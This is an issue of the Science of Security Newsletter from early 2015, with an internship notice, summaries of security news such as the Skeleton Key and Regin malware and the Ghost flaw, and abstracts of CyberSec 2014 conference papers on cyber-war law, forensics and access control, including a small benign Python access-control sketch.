Science of Security (SoS) Newsletter (2015 - Issue 1)



Each issue of the SoS Newsletter highlights achievements in current research, as conducted by various global members of the Science of Security (SoS) community. All presented materials are open-source, and may link to the original work or web page for the respective program. The SoS Newsletter aims to showcase the great deal of exciting work going on in the security community, and hopes to serve as a portal between colleagues, research projects, and opportunities.

Please feel free to click on any section of the Newsletter below; each link will bring you to its corresponding subsection:

General Topics of Interest

General Topics of Interest (GToI) reflects the most widely discussed current challenges and issues in the cybersecurity space. GToI includes news items related to cybersecurity, updated information regarding academic SoS research, interdisciplinary SoS research, profiles of leading researchers in the field of SoS, and global research being conducted on related topics.

Publications

The Publications of Interest provides available abstracts and links for suggested academic and industry literature discussing specific topics and research problems in the field of SoS. Please check back regularly for new information, or sign up for the CPS-VO SoS Mailing List.

Table of Contents

Science of Security (SoS) Newsletter (2015 - Issue 1)

(ID#:14-3354)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Science of Security (SoS) Summer Internships


Seeking top undergrads for a Science of Security summer internship

The Science of Security Summer Internship at the Information Trust Institute at the University of Illinois at Urbana-Champaign offers undergraduates the opportunity to explore the field of cybersecurity through a unique summer program. Science of Security is an emerging area that emphasizes the methodology of research in cybersecurity as much as the results - an approach that is critical to addressing the fundamental problems of security in a principled manner.

Participants will spend the summer pursuing a research program of their own design, under the mentorship of ITI faculty and/or staff. In addition to the research, the summer internship program will include visits to companies to learn about the issues and practice of cybersecurity in the real world. Applications are due February 1, 2015.

This program is sponsored by the National Security Agency through the Illinois Science of Security (SoS) Lablet Program.

Program dates: June 1 - July 24 (subject to change)

Information Needed for Application

  • Research Project Proposal
  • Resume
  • Transcripts
  • Names and contact information for 3 references

Important Dates

  • February 1, 2015 - Applications due
  • February 27, 2015 - Selection made

Please submit application materials by February 1 to https://my.iti.illinois.edu/submit/. Questions? Please contact Andrea Whitesell at whitesel@illinois.edu.

(ID#:14-3363)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


In the News


This section features topical, current news items of interest to the international security community. These articles and highlights are selected from various popular science and security magazines, newspapers, and online sources.

(ID#:14-3355)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


International News


"Skeleton Key malware linked to backdoor Trojan: Symantec," Security Week, 30 January 2015. Symantec researchers have discovered that Skeleton Key, malware discovered earlier this month that targets Active Directory domain controllers may be connected to "Backdoor.Winnti," which has previously attacked Asian gaming companies. (ID# 14-70078) See http://www.securityweek.com/skeleton-key-malware-linked-backdoor-trojan-symantec

"Cybercriminals encrypt website databases in 'RansomWeb' attacks," Security Week, 29 January 2015. Known as "RansomWeb," these attacks are executed over a long period of time in order to avoid detection. The attackers compromise a company's web application, then manipulate server scripts in order to encrypt data before it's stored into the database. Once even backups are encrypted, with the attackers ensuring that the key is nearly impossible to obtain, company data is effectively held hostage until payment is made. (ID# 14-70079) See: http://www.securityweek.com/cybercriminals-encrypt-website-databases-%E2%80%9Cransomweb%E2%80%9D-attacks

"What do China, FBI, and UK have in common? All three want backdoors in Western technology," The Register UK, 29 January 2015. The Chinese government is pressing for backdoors to be added to all imported technology, and they're not alone. Security experts see backdoors as a major vulnerability and condemn the notion as "unworkable." With China, the U.S. government, and the U.K. government all pushing for backdoor access to devices, the subsequent "international backdoor" would prove problematic. (ID# 14-70081) See: http://www.theregister.co.uk/2015/01/29/china_pushes_mandatory_backdoors/

"Regin super-malware has Five Eyes fingerprints all over it says Kaspersky," The Register UK, 28 January 2015. The malware "Regin," which evaded detection for up to six years, is often compared to Stuxnet and Duqu. Kaspersky analysts now say that Regin is the handiwork of a Five Eyes intelligence member nation (abbreviated FVEY, consisting of Australia, Canada, New Zealand, the U.K., and the U.S.). A discovered Regin plugin bears remarkable resemblance to source code produced by a Five Eyes nation. (ID# 14-70082) See: http://www.theregister.co.uk/2015/01/28/malware_bods_find_regin_malware_reeks_of_warriorpride/

"Estonia President wants China and Russia to help fight cyber crime", SC Mag.UK, 26 January 2015. At the "Fighting Shadows" convention in Switzerland, leaders from Kaspersky, Microsoft, and The United Nations met to discuss the appropriate response to cyber attacks, and the need for countries to stand united in an international coalition against cyber-crime. The failure of Russia and China, both countries notorious for cyber attacks, to sign the Budapest Convention is cited as an example that international anti-cyber-crime cooperation is not yet a reality. (ID# 14-70083) See: http://www.scmagazineuk.com/estonia-president-wants-china-and-russia-to-help-fight-cyber-crime/article/394366/

"European govts. urge U.S. tech companies to remove terrorist-related postings from sites", Homeland Security News Wire, 22 January 2015. French and German authorities have requested aid from US tech firms in identifying and removing radical terrorist material from social media sites, such as hate speech and radical recruitment videos. Following the terrorist attacks in Paris, sites like Facebook and Twitter are being asked to cooperate in pre-emptive filtering. U.S. tech firms are calling this move ineffective. (ID# 14-70084) See: http://www.homelandsecuritynewswire.com/dr20150122-european-govts-urge-u-s-tech-companies-to-remove-terroristrelated-postings-from-sites

"Skeleton Key Malware Analysis," Dell Secure Works, 12 January 2015. Dell SecureWorks Counter Threat Unit is reporting malware, dubbed Skeleton Key that bypasses authentication on Active Directory (AD) systems that implement single-factor authentication only. Attackers are able to gain access as any user by using a password of their choice, while the legitimate user can continue to authenticate as usual. Skeleton Key has since been deployed using stolen domain administrator credentials. (ID# 14-70085) See: http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/

"The Centcom 'hack' that wasn't," The Washington Post, 12 January 2015. A hacker group calling itself "CyberCaliphate" claims to be responsible for the hijacking of several U.S. military Central Command social media channels. The group allegedly leaked "classified" military PowerPoints and data, which many observers have pointed out, are not classified at all. In fact, much of the "leaked" documents are publically available, and come from sources like MIT's Lincoln Library and Google. (ID# 14-70086) See:  http://www.washingtonpost.com/blogs/the-switch/wp/2015/01/12/the-centcom-hack-that-wasnt/

"Surprise! North Korea's official news site delivers malware, too,", Ars technica, 12 January 2015. A security researcher recently discovered that North Korea's official news service, the Korean Central News Agency, also spreads malware. Disguised as a download entitled "FlashPlayer10.zip," for the incredibly obsolete Flash Player 10, the executable file contains a familiar Windows malware dropper. (ID# 14-70087) See: http://arstechnica.com/security/2015/01/surprise-north-koreas-official-news-site-delivers-malware-too/

"WhatsApp and iMessage could be banned under new surveillance plans," The Independent UK, 12 January 2015. Prime Minister David Cameron, of the U.K., seeks to prohibit the use of communication that can circumvent security services, such as auto-encrypted Apple iMessafe and WhatsApp, following the recent Paris shootings. (ID# 14-70088) See: http://www.independent.co.uk/life-style/gadgets-and-tech/news/whatsapp-and-snapchat-could-be-banned-under-new-surveillance-plans-9973035.html

"A cyberattack has caused confirmed physical damage for second time ever," Wired, 8 January 2015. In a case eerily mirroring Stuxnet, hackers have managed to cause the only second confirmed case of physical destruction of equipment by digital means. Hackers targeted an unnamed German steel mill, manipulating control systems to severely impede shut down of a blast furnace, effectively causing "massive" damage. The attackers executed a spear-fishing attack, and utilized the downloaded malware to gain access to one system. (ID# 14-70089) See: http://www.wired.com/2015/01/german-steel-mill-hack-destruction/

"Fingerprint theft just a shutter click away." Tech News World, 7 January 2015. Biometrics used for authentication purposes is seen as a multiple factor. Initially seen as a more secure way to protect personal data, biometrics should be used as part of two-factor authentication, at the very least. German hackers known as the Chaos Computer Club have demonstrated a way to lift prints. Security consultant Catherine Pearce reminds users that at least compromised passwords can be easily changed, not so much with fingerprints. (ID# 14-70090) See: http://www.technewsworld.com/story/81548.html

"Pro-ISIS hackers target New Mexico newspapers and hit paywall." The Denver Post, 6 January 2015. An ISIS-sympathetic hacker group, under the moniker "CyberCaliphate", has hacked the Mountain View Telegraph, a newspaper from a small New Mexico town. "Infidels, New Year will make you suffer" reads the message, but in order to see more, readers must answer a Google questionnaire. (ID# 14-70091) See: http://blogs.denverpost.com/techknowbytes/2015/01/06/pro-isis-hackers-target-new-mexico-newspapers/15032/

"U.S. firm finds malware targeting visitors to Afghan govt websites", Reuters, 21 December 2014. A newly discovered campaign, dubbed "Operation Poisoned Helmand," uses a watering-hole type attack to target users of trusted Afghan government websites. U.S. cybersecurity researchers say China, whose interests in Afghanistan have increased in light of U.S. and NATO decreased military presence, is the most likely threat actor. (ID# 14-70092) See: http://in.reuters.com/article/2014/12/21/china-afghanistan-cybersecurity-idINKBN0JZ0K420141221

(ID#:14-3356)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

US News


"Firm finds link between Regin spy tool and QWERTY keylogger," SC Mag., 27 January 2015. [Online]. Earlier this month, the source code for the so-called "QWERTY" keylogger malware was released as part of recent Snowden leaks and was found to have been used by numerous national intelligence agencies. Researchers found that QWERTY is identical in functionality to a specific module of the "Regin" spy tool and concluded that they were both produced by the same (or at least cooperating) developers. (ID: 14-50193) See: http://www.scmagazine.com/tool-detailed-in-snowden-documents-functions-like-regin/article/394764/

"CTB-Locker ransomware variant being distributed in spam campaign," SC Mag., 23 January 2015. [Online]. Trend Micro has identified a new strain of the bitcoin ransomware "Critroni," which is unique in its unusually high ransom demand and longer time to pay the ransom: ninety-six hours to pay three bitcoins, or about $700. This version is spread via a spam campaign and is "predominately impacting users in Europe, the Middle East and Africa (EMEA), China, Latin America and India." (ID: 14-50194) See: http://www.scmagazine.com/critroni-variant-of-ctb-locker-now-gives-victims-extra-time-to-pay-ransom/article/394247/

"NAFCU asks Congress to create bipartisan data breach working group," SC Mag., 22 January 2015. [Online]. The National Association of Federal Credit Unions (NAFCU) urged the U.S. Congress and Senate in a letter to consider creating a bicameral working group to help find solutions and pass legislation to combat the growing threat and consequences of data breaches. In a divided government, bipartisan cooperation and cooperation between government branches are integral parts of combating cybersecurity issues like data breaches. (ID: 14-50195) See: http://www.scmagazine.com/credit-unions-want-input-in-development-of-national-breach-law/article/394006/

"Adobe plugs Flash zero-day, investigates separate exploit reports," SC Mag., 22 January 2015. [Online]. Adobe has released a patch for the CVE-2015-0310, a Flash vulnerability that would allow hackers to bypass "memory randomization mitigations on the Windows operating system." Adobe is also investigating the Flash Player vulnerability CVE-2015-0311 and has announced that consumers should expect a patch in the near future. (ID: 14-50196) See:http://www.scmagazine.com/adobe-issues-emergency-fix-for-flash-player-vulnerability/article/393977/

"Android malware encounters surged in 2014, up by 75 percent, report says," SC Mag., 15 January 2015. [Online]. Mobile security company Lookout found that around 6.4 million Android devices were infected with malware in 2014, an astonishing 75 percent increase from 2013. Mobile devices are often seen as being safer that traditional personal computers, and they generally are -- but the increased functionality and usage in financial and business contexts means that they are becoming high-value targets. (ID: 14-50197) See: http://www.scmagazine.com/lookout-releases-2014-mobile-threat-report/article/392814/

"Skeleton Key Malware Analysis," Dell SecureWorks Counter Threat Unit Threat Intelligence, 12 January 2015. [Online]. The newly-discovered "Skeleton Key" malware allows attackers to bypass Active-Directory (AD) systems that only employ passwords for authentication. Skeleton Key allows attackers to authenticate themselves as a legitimate user, thereby granting them access to remote access services within a victim network. Two variants were found, the older of which allowed attackers to analyze the victim's patching process. (ID: 14-50198) See: http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/

"Pro-ISIS attackers compromise U.S. Central Command Twitter and YouTube accounts," SC Mag., 12 January 2015. [Online]. The U.S. Central Command (CENTCOM) confirmed that its YouTube and Twitter accounts were hacked. Both accounts were taken offline after attackers, who appear to have been supporters of the Islamic State, used the accounts to post military documents and threatening messages. The military documents, though disguised to look like part of a new breach, were actually part of the public domain. It is suspected that the attackers obtained credentials through some kind of phishing or brute-force attack. (ID: 14-50199) See: http://www.scmagazine.com/us-central-command-social-media-accounts-hacked/article/392128/

"Cisco Annual Security Report Reveals Widening Gulf between Perception and Reality of Cybersecurity Readiness," Security Mag., 20 January 2015. [Online]. Cyber criminals have been constantly developing techniques of increasing sophistication to evade detection and bypass security measures, which means that security teams need to work together on improving their methods more than ever before. According to a study by Cisco, however, not everybody is on the same page when it comes to perceptions of cyber readiness. (ID: 14-50200) See: http://www.securitymagazine.com/articles/86050-cisco-annual-security-report-reveals-widening-gulf-between-perception-and-reality-of-cybersecurity-readiness

"Obama Calls for Data Breach Notification Law," Security Mag., 12 January 2015. [Online]. U.S. President Barack Obama intends to ask Congress to pass a law that requires companies to report data breaches to victims within thirty days, as well as a second privacy law that would allow consumers to decide what personal data they are willing to give to companies, and how they want that data to be used. Additionally, Obama intends to push for a digital privacy bill that would regulate collection and use of data collected from educational services. (ID: 14-50201) See: http://www.securitymagazine.com/articles/86043-obama-calls-for-data-breach-notification-law

"Snowden reveals that China stole plans for a new F-35 aircraft fighter," Cyber Def. Mag., 22 January 2015. [Online]. According to Snowden leaks, Chinese government hackers were able to obtain plans and technical data -- potentially as much as 50 terabytes worth -- for a new F-35 fighter jet. The F-35, which is being developed by Lockheed Martin at a record-breaking $400 billion, is a joint effort between the U.S., U.K., and Australian governments. (ID: 14-50202) See: http://www.cyberdefensemagazine.com/snowden-reveals-that-china-stole-plans-for-a-new-f-35-aircraft-fighter/

"5800 Gas Station Tank Gauges vulnerable to cyber attacks", Cyber Def. Mag., 26 January 2015. [Online]. Recent research by Rapid7 has found that approximately 5,800 gas stations across the U.S. are vulnerable to remote cyber attacks. The affected gas stations all use Automated Tank Gauges (ATGs), devices that are used to prevent overfilling of underground storage tanks that have no password protection. Compromised ATGs could potentially produce false alarms and shut down a station. (ID: 14-50203) See: http://www.cyberdefensemagazine.com/5800-gas-station-tank-gauges-vulnerable-to-cyber-attacks/

"USA and UK announce joint cyber 'war games' to improve cyber defenses," Cyber Def. Mag., 20 January 2015. [Online]. The U.S. and U.K. have agreed to participate in mutual cyber "war games" in which teams from each nation would "attack" each other to bring to light security flaws in each other's systems. The exercises are intended to prepare both nations for real-life state-sponsored attacks. British Prime Minister David Cameron stressed the importance of cyber security readiness in his announcement of the war games, noting that cyberattacks "can have real consequences to people's prosperity". (ID: 14-50204) See: http://www.cyberdefensemagazine.com/usa-and-uk-announce-joint-cyber-war-games-to-improve-cyber-defenses/

"Project Zero team has disclosed a new unpatched Windows 8 flaw," Cyber Def. Mag., 15 January 2015. [Online]. Google's Project Zero hacking team has disclosed a newly found Windows 8.1 and Windows 7 "Privilege Escalation" vulnerability, and has demonstrated it in a simulated Proof of Concept (PoC) attack. There has been disagreement between Google and Microsoft about the disclosure policy; Microsoft had asked Google to delay the disclosure of the bug, with the intention to fix it by February 2015. Google refused, and disclosed it within the normal 90-day timeline. (ID: 14-50205) See: http://www.cyberdefensemagazine.com/project-zero-team-has-disclosed-a-new-unpatched-windows-8-flaw/

"Malaysia Airlines Site Back Up as Hackers Threaten Data Dump," Infosecurity Mag., 27 January 2015. [Online]. Hacking group "Lizard Squad" has claimed responsibility for an attack on Malaysia Airline's website and has threatened on social media to release stolen data, though the airline claims that no sensitive data was stolen. Visitors to the website were directed to a page apparently owned by Lizard Squad, though the issue has since been resolved. (ID: 14-50206) See: http://www.infosecuritymagazine.com/news/malaysia-air-site-back-hackers/

"China Blamed for MITM Attack on Outlook," Infosecurity Mag., 19 January 2015. [Online]. Anti-censorship rights group Greatfire.org is pointing fingers at China's Cyberspace Administration after an attack on Microsoft Outlook users. The daylong MITM attack, which utilized a self-signed certificate, is suspected by some to be an attempt by China to test their MITM capabilities, which are used to bypass HTTPS and intercept communications. (ID: 14-50209) See: http://www.infosecurity-magazine.com/news/china-blamed-for-mitm-attack-on/

"Windows 10: Secure enough for government?" GCN, 23 January 2015. [Online]. Windows 10 will feature new and improved security features, including technologies such as multifactor authentication, data-loss prevention, and other low-level hardware and kernel measures. Newer security features could be very attractive for government and business, who are facing increasing amounts of cyber threats. (ID: 14-50210) See: http://gcn.com/articles/2015/01/23/windows-10-security.aspx?admgarea=TC_SecCybersSec

"Critical Java updates fix 19 vulnerabilities, disable SSL 3.0," ComputerWorld, 21 January 2015. [Online]. A new Java security update patches 19 vulnerabilities and removes support for Secure Sockets Layer (SSL) 3.0, which is outdated and vulnerable. A significant portion of the 19 vulnerabilities scored high on the severity scale, with six scoring 9.3 or above out of 10. Additionally, this will be the last security update for Java 7 (without a long term contract); users will need to migrate to Java 8 to receive automatic updates in the future. (ID: 14-50211) See: http://www.computerworld.com/article/2873215/critical-java-updates-fix-19-vulnerabilities-disable-ssl-30.html

"Fed data at risk in attacks on university computers," FCW, 27 January 2015. [Online]. University computer networks, which contain large volumes of both devices and data, are a lucrative target for cyber criminals, according to a memo by the Department of Homeland Security (DHS). Last spring, for instance, attackers were able to utilize a supercomputer at a U.S. university to perform DDoS attacks on several businesses that provide server services for gaming. (ID: 14-50212) See: http://fcw.com/articles/2015/01/27/fed-data-at-risk.aspx

"Ending the tyranny of passwords," FCW, 16 January 2015. [Online]. The FIDO (Fast IDentity Online) Alliance, a collaborative effort between 150 members including Google and Samsung, has been striving towards creating stronger two-factor authentication systems while phasing out passwords as a method of authentication. The group has been working to create specifications for newer methods like biometrics and hardware tokens, technologies that could prove to be much more secure than passwords without compromising convenience. (ID: 14-50213) See: http://fcw.com/articles/2015/01/16/tyranny-of-passwords.aspx

"How can we protect our information in the era of cloud computing?" University of Cambridge Research, 26 January 2015. [Online]. Researcher Jon Crowcroft argues that cloud storage puts data at an increased risk; rather, information should be stored in a diverse range of P2P systems. Spreading data out, according to Crowcroft, would not just hamper efforts to obtain that information illegitimately, but would make it easier to access as well. The centralized nature of cloud solutions, on the other hand, can make data easier to steal. (ID: 14-50214) See: http://www.cam.ac.uk/research/news/how-can-we-protect-our-information-in-the-era-of-cloud-computing

"NIST Revises Crypto Standards Guide," Gov Info Security, 23 January 2015. [Online]. The National Institute of Standards and Technology (NIST) has just released its NIST Cryptographic Standards and Guidelines, a document which details NIST's new cryptographic standard development process. Notably, the document stresses transparency and details the interactions between NIST and the NSA, a relationship which has sparked considerable negative publicity since the first draft was issued nearly a year ago. (ID: 14-50215) See: http://www.govinfosecurity.com/nist-revises-crypto-standards-guide-a-7831

"New technology proves effective in thwarting cyberattacks on drones," Homeland Security News Wire, 27 January 2015. [Online]. Researchers with the University of Virginia and Georgia Institute of Technology have successfully tested methods developed by the multi-university Systems Engineering Research Center to keep unmanned aerial vehicles safe from cyber attack. Drones, as they are often referred to, are used to collect sensitive data and even perform missile strikes, which makes security a necessity. (ID: 14-50216) See: http://www.homelandsecuritynewswire.com/dr20150127-new-technology-proves-effective-in-thwarting-cyberattacks-on-drones

"Universities adding cybersecurity programs to their curricula to meet growing demand," Homeland Security News Wire, 14 January 2015. [Online]. The increasing prevalence and gravity of cyber attacks has led to a high demand for well-trained cybersecurity workers, which has in turn increased the demand for cybersecurity education. Many universities are bulking up their cybersecurity programs, and students are taking advantage of the value that cybersecurity education can give them in the job market. (ID: 14-50217) See: http://www.homelandsecuritynewswire.com/dr20150114-universities-adding-cybersecurity-programs-to-their-curricula-to-meet-growing-demand

"It Took Me Two Clicks To Trace Ross Ulbricht To The Silk Road," Forbes, 16 January 2015. [Online]. Computer security researcher Nicholas Weaver details how he was able to connect Ross Ulbricht to the deep-web marketplace "Silk Road" by tracing bitcoin transactions. According to Weaver, 3,255 bitcoins (about $300,000 USD) was transferred from the Silk Road to Ulbricht. Ulbricht is currently being charged as the alleged founder of the anonymous market. (ID: 14-50218) See: http://www.forbes.com/sites/valleyvoices/2015/01/16/it-took-me-two-clicks-to-trace-ross-ulbricht-to-the-silk-road/?ss=Security

"Linux makers release patch to thwart new 'Ghost' cyber threat," Reuters, Edition: U.S., 27 January 2015. [Online]. Linux distribution developers, including Red Hat Inc., have released a patch to fix "Ghost," a vulnerability which could purportedly allow hackers to remotely control vulnerable systems. Researchers found that they could compromise servers with a malicious email, without that email even being opened. Fortunately, there have not been any reports of the vulnerability being used "in the wild." As with Heartbleed and shellshock, the vulnerability was discovered in open-source software; which in this case is the Linux GNU C Library. (ID: 14-50219) See: http://www.reuters.com/article/2015/01/27/us-cybersecurity-linux-idUSKBN0L02RS20150127

(ID#:14-3357)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

International Security Research Conferences


The following pages provide highlights of Science of Security related research presented at the following international conferences:

  • Signal Propagation and Computer Technology 2014, India
  • Information Assurance and Cyber Security (CIACS) 2014, Pakistan
  • Cyber Security, Cyber Warfare, and Digital Forensics (CyberSec) 2014, Lebanon
  • Information Security for South Africa, 2014


(ID#:14-3359)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Cyber Security, Cyber Warfare, and Digital Forensics (CyberSec) - Beirut, Lebanon


The 2014 Third International Conference on Cyber Security, Cyber Warfare and Digital Forensic (CyberSec) was held April 29 - May 1, 2014, in Beirut, Lebanon. The twelve papers published from it are cited here.

 

Watney, M., "Challenges Pertaining To Cyber War Under International Law," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 1-5, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913962. State-level intrusion in the cyberspace of another country seriously threatens a state's peace and security. Consequently, many types of cyberspace intrusion are being referred to as cyber war with scant regard for the legal position under international law. This is but one of the challenges facing state-level cyber intrusion. The current rules of international law prohibit certain types of intrusion, but international law does not define which intrusions fall within the prohibited category nor when the threshold of intrusion is surpassed. International lawyers have to determine the type of intrusion and threshold on a case-by-case basis. The Tallinn Manual may serve as a guideline in this assessment, but determination of the type of intrusion and attribution to a specific state is not easily established. The current rules of international law do not prohibit all intrusion which at state level may be highly invasive and destructive. Unrestrained cyber intrusion may result in cyberspace becoming a battle space in which states with strong cyber abilities dominate, resulting in resentment and fear among other states. The latter may be prevented on an international level by involving all states in an equal and transparent manner in cyberspace governance.

Keywords: law; security of data; Tallinn Manual; cyber war; cyberspace governance; cyberspace intrusion; international law; legal position; state-level cyber intrusion; Computer crime; Cyberspace; Force; Law; Manuals; Cyber war; Estonia; Stuxnet; challenges; cyberspace governance; cyberspace state-level intrusion; international law (ID#: 14-3392)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913962&isnumber=6913961

 

Holm, E.; Mackenzie, G., "The Importance Of Mandatory Data Breach Notification To Identity Crime," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 6-11, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913963. The relationship between data breaches and identity crime has been scarcely explored in current literature. However, there is an important relationship between the misuse of personal identification information and identity crime, as the former is in many respects the catalyst for the latter. Data breaches are one of the ways in which this personal identification information is obtained by identity criminals, and thereby any response to data breaches is likely to impact the incidence of identity crime. Initiatives around data breach notification have become increasingly prevalent and are now seen in many State legislatures in the United States and overseas. The Australian Government is currently in the process of introducing mandatory data breach notification laws. This paper explores the introduction of mandatory data breach notification in Australia, and lessons learned from the experience in the US, particularly noting the link between data breaches and identity crime. The paper proposes that through the introduction of such laws, identity crimes are likely to be reduced.

Keywords: computer crime; law; Australia; US; identity crime; mandatory data breach notification laws; personal identification information; Australia; Data privacy; Educational institutions; Government; Law; Privacy; Security; data breaches; identity crime; mandatory breach reporting; privacy (ID#: 14-3393)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913963&isnumber=6913961

 

Mohamed, I.A.; Bt Abdul Manaf, A., "An enhancement of traceability model based-on scenario for digital forensic investigation process," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 12-15, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913964. The digital forensic investigation process is about identifying and tracing the cause of an incident, and traceability is a very important part of the investigation's search for evidence. In this paper, the traceability model of the digital forensic investigation process is enhanced based on scenario, with supporting literature and justification.

Keywords: digital forensics; program diagnostics; digital forensic investigation process; incident cause identification; incident cause tracing; traceability model based-on scenario enhancement; Adaptation models; Computational modeling; Conferences; Digital forensics; Educational institutions; Materials; Safety; Evidence; Forensic; Scenario; traceability (ID#: 14-3394)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913964&isnumber=6913961

 

Geepalla, E., "Comparison Between Alloy and Timed Automata for Modelling And Analysing Of Access Control Specifications," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 16-21, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913965. This paper presents a comparative study between Alloy and Timed Automata for modelling and analysing of access control specifications. In particular, this paper compares Alloy and Timed Automata for modelling and analysing of Access Control specifications in the context of Spatio-Temporal Role Based Access Control (STRBAC) from capability and performance points of view. To conduct the comparison study the same case study (SECURE bank system) is specified using Alloy and Timed Automata. In order to transform the specification of the SECURE bank system into Alloy and Timed Automata this paper makes use of our earlier methods AC2Alloy and AC2Uppaal respectively. The paper then identifies the most important advantages and disadvantages of Alloy and Timed Automata for modelling and analysing of access control specifications.

Keywords: authorisation; automata theory; bank data processing; directed graphs; formal specification; AC2Alloy method; AC2Uppaal method; SECURE bank system; STRBAC; access control specification analysis; access control specification modelling; directed graph; spatio-temporal role based access control; timed automata; Access control; Analytical models; Automata; Clocks; Computational modeling; Metals; Object oriented modeling (ID#: 14-3395)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913965&isnumber=6913961
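
The STRBAC model the paper targets constrains access not only by role but also by location and time. As a deliberately simplified, hypothetical illustration of what such a specification expresses (names and parameters invented, unrelated to the paper's SECURE bank case study), here is a short Python sketch in which a role grants a permission only inside an allowed place and time window:

    from dataclasses import dataclass

    @dataclass(frozen=True)
    class SpatioTemporalRole:
        name: str
        permissions: frozenset
        locations: frozenset   # where the role is enabled
        hours: range           # hours of the day when the role is enabled

    def access_allowed(role: SpatioTemporalRole, permission: str,
                       location: str, hour: int) -> bool:
        # Grant only when permission, place, and time all line up.
        return (permission in role.permissions
                and location in role.locations
                and hour in role.hours)

    teller = SpatioTemporalRole(
        name="bank_teller",
        permissions=frozenset({"read_account", "post_transaction"}),
        locations=frozenset({"branch_floor"}),
        hours=range(9, 17),    # enabled 09:00-16:59 only
    )

    print(access_allowed(teller, "post_transaction", "branch_floor", 10))  # True
    print(access_allowed(teller, "post_transaction", "branch_floor", 22))  # False
    print(access_allowed(teller, "post_transaction", "data_center", 10))   # False

Tools like Alloy or Timed Automata let such constraints be checked exhaustively rather than case by case, which is exactly the capability the paper compares.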

 

Yusoff, M.N.; Mahmod, R.; Dehghantanha, A.; Abdullah, M.T., "An Approach For Forensic Investigation in Firefox OS," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 22-26, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913966. The advancement of smartphone technology has attracted many companies in developing mobile operating systems. Mozilla Corporation recently released a Linux-based open source operating system, named Firefox OS. The emergence of Firefox OS has created new challenges, concentrations and opportunities for digital investigators. In general, Firefox OS is designed to allow smartphones to communicate directly with HTML5 applications using JavaScript and the newly introduced WebAPI. However, the use of JavaScript in HTML5 applications and the lack of OS-level restrictions might lead to security issues and potential exploits. Therefore, forensic analysis for Firefox OS is urgently needed in order to investigate any criminal intentions. This paper will present an approach and methodology, in a forensically sound manner, for Firefox OS.

Keywords: Internet; Java; Linux; application program interfaces; digital forensics; hypermedia markup languages; mobile computing; public domain software; smart phones; Firefox OS; HTML5 applications; JavaScript; Linux-based open source operating system; Mozilla Corporation; OS restriction; WebAPI; criminal intentions; digital investigation; forensic analysis; forensic investigation; mobile operating system; potential exploits; security issues; smartphone technology; Forensics; Google; Mobile communication; Operating systems; Security; Smart phones; Firefox OS; Forensic Method; Mobile forensics; digital investigation (ID#: 14-3396)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913966&isnumber=6913961

 

Yusoff, M.N.; Mahmod, R.; Abdullah, M.T.; Dehghantanha, A., "Mobile Forensic Data Acquisition in Firefox OS," Cyber Security, Cyber Warfare and Digital Forensic (CyberSec), 2014 Third International Conference on, pp. 27-31, April 29 2014-May 1 2014. doi: 10.1109/CyberSec.2014.6913967. Mozilla Corporation has recently released a Linux-based open source operating system, namely Firefox OS. The arrival of Firefox OS has created new challenges, concentrations and opportunities for digital investigators. Currently, Firefox OS is still not fully supported by most of the existing mobile forensic tools. Even when the phone is detected as Android, only pictures from the removable card were able to be captured. Furthermore, internal data acquisition is still not working. Therefore, there are very large opportunities to explore Firefox OS at every stage of the mobile forensic procedure. This paper will present an approach for mobile forensic data acquisition, in a forensically sound manner, from a device running Firefox OS. The approach will largely use the UNIX dd command to create a forensic image from the running device.

Keywords: Linux; data acquisition; image forensics; mobile computing; public domain software; Android phone; Firefox OS; Linux-based open source operating system; Mozilla Corporation; UNIX dd command; digital investigators; forensic image; internal data acquisition; mobile forensic data acquisition; Data acquisition; Flash memories; Forensics; GSM; Mobile communication; Smart phones; Firefox OS; Mobile forensic; data acquisition (ID#: 14-3397)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6913967&isnumber=6913961
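
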